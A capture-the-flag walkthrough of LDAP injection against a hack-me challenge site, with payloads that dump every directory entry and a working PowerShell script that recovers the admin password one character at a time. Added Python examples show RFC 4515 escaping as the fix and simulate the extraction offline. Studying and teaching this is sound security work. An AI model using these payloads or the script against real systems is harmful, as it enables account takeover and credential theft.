Exploiting LDAP Injection: A Walkthrough
This article is a step-by-step walkthrough of exploiting an LDAP injection vulnerability, using a challenge from a hack-me style website as the practical example. LDAP, the Lightweight Directory Access Protocol, is used to query and maintain distributed directory services (user accounts, groups, contact details) over a network. LDAP injection arises when a web application builds an LDAP search filter by concatenating user input into it without escaping the filter metacharacters, so the input can change the structure of the filter rather than just the value being searched for.
For this walkthrough, we'll use PowerShell, Microsoft's task automation and configuration management framework (and my personal favorite).
Step 1: Identify the Injection Point
The URL provided for this challenge is http://1.badsite.org/web-server/. If you run a search on the site, the URL changes to http://1.badsite.org/web-server/?action=dir&search=a. The search value is passed as a GET parameter and is inserted into a server-side query, which makes it a candidate LDAP injection point.
Step 2: Construct the Payload
After identifying the injection point, the next step is constructing a payload that exploits it. The search filter used by the application is: (&(sn=*)(Email=*input*)), with the user-supplied value inserted in place of input between two wildcards. A well-crafted payload is )(sn=. The leading ) closes the Email assertion early, (sn= opens a new assertion, and the template's own trailing *) completes it, so the parentheses stay balanced and the filter remains syntactically valid while its logic has changed.
The filter the server actually executes is therefore: (&(sn=*)(Email=*)(sn=*)). Every assertion in it is a bare wildcard that matches any entry with that attribute present, so the search returns every user in the directory, email addresses included.
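To make the mechanics of Step 2 concrete, here is an added Python example (not part of the original challenge or article) that builds the filter from the template above with plain concatenation, as the application does, and then with RFC 4515 escaping, as a fixed application would. The attribute name Email, the template and the payloads are taken from the text; the escaping table and the helper that counts assertions are written for this example.

```python
"""Added example: how the challenge's search filter is broken by the ')(sn='
payload, and how RFC 4515 escaping neutralises it.  Template, attribute
names and payloads come from the walkthrough; everything else is
illustrative code written for this example."""

# The application's filter, with the user value dropped between two wildcards.
TEMPLATE = "(&(sn=*)(Email=*{value}*))"

# RFC 4515 section 3: characters that must be hex-escaped inside an assertion value.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def build_filter_unsafe(user_input: str) -> str:
    """Vulnerable: the raw value is concatenated into the filter, as the challenge does."""
    return TEMPLATE.format(value=user_input)


def ldap_escape(value: str) -> str:
    """Escape a string for use as an LDAP filter assertion value (RFC 4515)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_safe(user_input: str) -> str:
    """Fixed: metacharacters in the value can no longer change the filter's structure."""
    return TEMPLATE.format(value=ldap_escape(user_input))


def count_assertions(ldap_filter: str) -> int:
    """Count attribute assertions in a filter string.

    Every literal '(' opens either a compound filter (&, |, !) or an
    assertion; escaped parentheses (\\28, \\29) are ordinary value text and
    do not count.  Enough to show that the payload adds an assertion to the
    unsafe filter and none to the escaped one.
    """
    total = 0
    for i, ch in enumerate(ldap_filter):
        if ch == "(" and ldap_filter[i + 1:i + 2] not in ("&", "|", "!"):
            total += 1
    return total


if __name__ == "__main__":
    # "a" is a benign search; the other two are the payloads from Steps 2 and 4.
    for payload in ["a", ")(sn=", "admin*)(password=a"]:
        unsafe = build_filter_unsafe(payload)
        safe = build_filter_safe(payload)
        print(f"input  : {payload!r}")
        print(f"unsafe : {unsafe}  ({count_assertions(unsafe)} assertions)")
        print(f"escaped: {safe}  ({count_assertions(safe)} assertions)")
        print()
```

Run it and compare the two outputs for the )(sn= payload: the unsafe filter gains a third assertion, while the escaped one still has two and the injected text is searched for literally as part of the Email value.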
Step 3: Identify Attribute Names
Before going after the password, you need to know the attribute names the directory actually uses, since the injected assertion has to name a real attribute. Below is a list of common LDAP attribute names. Most are standard (RFC 4519 and related schemas); password, username and id are not standard names (the standard equivalents are userPassword and uid) but appear in custom schemas, and password is the one this challenge uses:
c
cn
dc
facsimileTelephoneNumber
co
gn
homePhone
jpegPhoto
id
l
mail
mobile
o
ou
owner
name
pager
password <--- a good one
sn <--- a good one
st
uid
username <--- a good one
userPassword
Step 4: Exploit the Injection
After dumping all the emails and finding the username and email of the "admin" account, we have what we need to go after its password. The idea is a boolean oracle: inject (password=<guess>*) after the admin's Email assertion. If the guess is a correct prefix of the stored password, the admin entry still matches the filter and the admin's email appears in the response; otherwise it does not. Repeating this one character at a time recovers the password. Here is the PowerShell script that carries out the attack.
# Target URL with the injection payload; the password guess is appended to the end, so the
# executed filter becomes (&(sn=*)(Email=*admin*)(password=<guess>*))
$uri = "http://1.badsite.org/web-server/?action=dir&search=admin*)(password="
# Marker that appears in the response only when the admin entry matched the filter
# (the admin's email address as shown in the Step 2 dump)
$adminEmail = "admin@ch26.challenge01.root-me.org"
# Characters that could be in the password (extend this if symbols are expected)
$characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
# Progressively built password
$password = ""
# Assume the password is not complete
$passwordComplete = $false
# Safety bound so a response that always contains the marker cannot loop forever
$maxLength = 64
while (-not $passwordComplete -and $password.Length -lt $maxLength) {
    $passwordComplete = $true
    for ($j = 0; $j -lt $characters.Length; $j++) {
        # Current guess: known prefix plus one candidate character
        $payload = $uri + $password + $characters[$j]
        # -UseBasicParsing avoids the Internet Explorer parsing engine on Windows PowerShell 5.1
        $response = Invoke-WebRequest -Uri $payload -UseBasicParsing
        # If the admin's email is in the response, the prefix guess matched
        if ($response.Content -like "*$adminEmail*") {
            $password += $characters[$j]
            # $( ) is required so the indexed element is expanded, not the whole string followed by "[$j]"
            Write-Host "Found '$($characters[$j])', moving to the next position. Password so far: $password"
            # A character was found for this position, so the password is not yet complete
            $passwordComplete = $false
            # Move on to the next position
            break
        }
    }
}
# Output the final password
Write-Host "Final password: $password"
When the script runs, it appends one candidate character at a time to the known prefix and sends the request. If the response contains the admin's email, the filter matched, so the candidate is kept and the script moves on to the next position; otherwise it tries the next candidate.
The loop ends when no character in the list extends the prefix, and the password recovered so far is printed. Two caveats apply before trusting the result. First, the loop also stops if the next real character is outside the character list (a symbol, for example), so confirm the result with one more request without the trailing wildcard, i.e. (password=<recovered>), which only matches if the value is complete. Second, if the attribute is compared with a case-insensitive matching rule, 'a' and 'A' both match and the script keeps whichever comes first in the list, so the recovered string may differ in case from the stored value.
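To show the extraction logic in a form you can run without the challenge server, here is an added Python example (not the article's own script, which is the PowerShell above) that generalises the loop and makes both caveats explicit. SimulatedDirectory is a constructed stand-in for the target: prefix_matches answers as the web page does for (password=<guess>*) and exact_matches for (password=<guess>) with no wildcard. Its case_exact flag is an assumption used to model the two matching rules, and the secrets are made up.

```python
"""Added example: character-at-a-time extraction through a boolean LDAP
oracle, with the end-of-value confirmation and the case-sensitivity
caveat made explicit.  The directory here is simulated so the code runs
offline; the secrets are made up."""

import string

# Same order as the PowerShell script: lowercase first, then uppercase, then digits.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits


class SimulatedDirectory:
    """Stand-in for the vulnerable application (constructed for this example).

    case_exact=True models an attribute compared with caseExactMatch,
    case_exact=False one compared with caseIgnoreMatch.
    """

    def __init__(self, secret: str, case_exact: bool = True):
        self.secret = secret
        self.case_exact = case_exact
        self.requests = 0  # how many HTTP requests the real attack would have sent

    def _norm(self, value: str) -> str:
        return value if self.case_exact else value.lower()

    def prefix_matches(self, guess: str) -> bool:
        """Does (password=<guess>*) match?  True iff the marker appears in the page."""
        self.requests += 1
        return self._norm(self.secret).startswith(self._norm(guess))

    def exact_matches(self, guess: str) -> bool:
        """Does (password=<guess>) match?  No wildcard, so only a complete value matches."""
        self.requests += 1
        return self._norm(self.secret) == self._norm(guess)


def extract(oracle: SimulatedDirectory, alphabet: str = ALPHABET, max_len: int = 64):
    """Recover the attribute value one character at a time.

    Returns (recovered, confirmed).  The loop stops when no character in
    `alphabet` extends the prefix, which happens both when the value is
    complete and when the next real character is outside the alphabet; the
    exact-match query afterwards tells the two cases apart.  max_len bounds
    the loop in case the page always contains the marker (e.g. an error page).
    """
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if oracle.prefix_matches(found + ch):
                found += ch
                break
        else:
            break  # nothing extended the prefix
    return found, oracle.exact_matches(found)


if __name__ == "__main__":
    cases = [("Sup3rS3cret", True), ("Sup3rS3cret", False), ("pa$$word", True)]
    for secret, case_exact in cases:
        directory = SimulatedDirectory(secret, case_exact)
        recovered, confirmed = extract(directory)
        print(f"stored={secret!r} case_exact={case_exact} -> recovered={recovered!r} "
              f"confirmed={confirmed} requests={directory.requests}")
```

The three cases show the behaviours discussed above: with an exact-match rule the value comes back as stored; with a case-ignoring rule it comes back in lowercase because lowercase letters are tried first; and when the secret contains a character outside the alphabet the loop stops early and the exact-match confirmation fails, which is the signal to widen the character set rather than report a partial value.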